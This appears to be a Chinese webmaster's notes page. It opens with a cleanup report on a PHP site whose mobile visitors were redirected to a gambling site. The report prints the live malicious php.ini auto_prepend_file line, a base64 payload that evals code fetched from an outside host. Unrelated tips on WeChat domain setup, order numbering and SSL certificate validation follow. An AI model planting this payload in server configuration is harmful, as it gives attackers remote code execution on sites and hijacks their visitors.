网站全部php页面顶部莫名其妙被加上了以下图片内容（红框部分），但是源码中却没有问题，该内容会导致移动端显示被劫持到sq网站

最后排查发现是php配置文件php.ini中的auto_prepend_file =部分被添加了病毒内容，内容如下：

auto_prepend_file = "data:;base64,PD9waHAgaW5pX3NldCgiZGlzcGxheV9lcnJvcnMiLCAib2ZmIik7ZXZhbCgnPz4nLmZpbGVfZ2V0X2NvbnRlbnRzKGJhc2U2NF9kZWNvZGUoJ2FIUjBjRG92THpndWFuTmpNakF5TkRRdVkyOXRPamd4TDJwell5OXFjMk11ZEhoMCcpKSk7Pz4="

该部分的内容的base64解析为以下内容：

可以看出解析后的内容使网站转向了一个sq网站，删除该内容问题解决；

但是未解决的是php.ini文件是如何被更改的，暂时还不清楚

（网站是否备案并不影响直接打开的，当然最好进行备案，备案的域名无违规情况下是可以直接访问的）

备案/非备案无法直接打开解决办法：

1.确定域名下的网站没有违规内容（有违规内容清楚且申诉）

2.申请一个公众号（如果有），则在公众号后台配置配置你的域名

路径：公众号设置--功能设置--将下面三个域名的设置都设置了
如图 #其中需要将一份文件下载下来放到域名对应网站的根目录下

1.订单号唯一组成：order_sn + 'X' + order_log + 'X' + time() , 取订单号时使用explode('X', 自定义订单号)
2.如果是使用商城内二维码形式的，在flow.dwt和user_transaction.dwt中增加弹窗（关键词：wxpay_dialog）和修改查询支付成功部分(关键词：checkorder())

https://域名/.well-known/acme-challenge/ERHXtidqZd-PISxxxxxxxxxxxxxxx

当显示无法验证，且404时，请检查以下内容
1.是否开启了强制ssl，重定向，反向代理
2.如果以上都没有且还是无法访问，执行3
3.更改网站运行目录为/，即指向该网站目录，再次申请ssl续签或者申请新的，申请成功后再改回原本目录